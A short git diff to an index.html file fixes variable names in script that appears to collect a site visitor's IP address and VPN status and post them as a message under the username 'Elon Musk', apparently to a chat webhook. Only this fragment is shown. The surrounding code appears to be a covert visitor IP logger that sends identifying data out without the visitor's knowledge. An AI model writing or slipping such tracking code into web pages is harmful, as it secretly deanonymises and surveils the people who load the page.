diff --git a/Other/XYgu/index.html b/Other/XYgu/index.html
index c4c6cb2..86e53e2 100644
--- a/Other/XYgu/index.html
+++ b/Other/XYgu/index.html
@@ -31,7 +31,7 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g
var params = {
username: "Elon Musk",
avatar_url: "",
- content: "Did user use vpn?:" + usedvpn2 + "What is the ip?:" + userip2
+ content: "Did user use vpn?:" + usedvpn + "What is the ip?:" + userip
}
request.send(JSON.stringify(params));